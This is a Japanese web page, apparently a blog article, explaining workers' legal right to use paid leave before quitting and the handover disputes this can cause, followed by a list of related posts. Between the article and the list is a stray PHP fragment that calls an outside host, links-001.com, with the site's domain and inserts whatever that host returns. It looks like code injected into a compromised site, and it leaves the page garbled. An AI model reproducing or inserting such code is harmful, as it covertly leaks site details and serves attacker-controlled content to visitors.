退職間際の有給休暇に関する法律

退職間際になり、たまっていた有給休暇を取ってから辞めるケースがあります。
法律では、有給休暇を取ることは認められていますが、会社によっては承認されない場合もあるようです。
上司などの承認を取る必要はありませんし、どんな休暇を過ごすのか、その内容を告げる必要もありません。
休暇の内容によって承認されない、などということもないのです。
ただ、退職前の有給休暇の取得を巡ってトラブルになるケースは、意外に多いようです。
トラブルになるケースですが、引継ぎがある場合です。
会社としては、ほかの人に仕事内容を引き継いでもらわないと困ることから、退職を承認できない場合が出てきます。
引継ぎをしてから退職するためには、退職日をずらして引き継ぐ方法などがあります。
円満に退職するには、話し合いが必要でしょう。
いずれにしても会社に迷惑をかけずに、ギリギリで退職届けを提出するようなことのないように、計画的に会社を辞める必要があります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新投稿

  • 有給休暇を利用して休むことは労働者の権利である

    日本には労働基準法という法律があってそこには有給休暇についてのことが詳細に書かれています。
    有 …

    続きを読む...

  • 法律で定められる有給休暇制度として

    働き始めて6ヶ月が経過し、その間に労働日の8割以上出勤した場合には10日間の「有給休暇」というものが …

    続きを読む...

  • 年次有給休暇に関する法律の基礎知識

    年次有給休暇は、労働基準法という法律で定められた労働者の権利です。
    したがって会社が制度を導入 …

    続きを読む...

  • 法律における有給休暇

    給料を減らされずに休むことができる有給休暇。
    ここでは、法律でどのように定められているか説明し …

    続きを読む...

お知らせ

一覧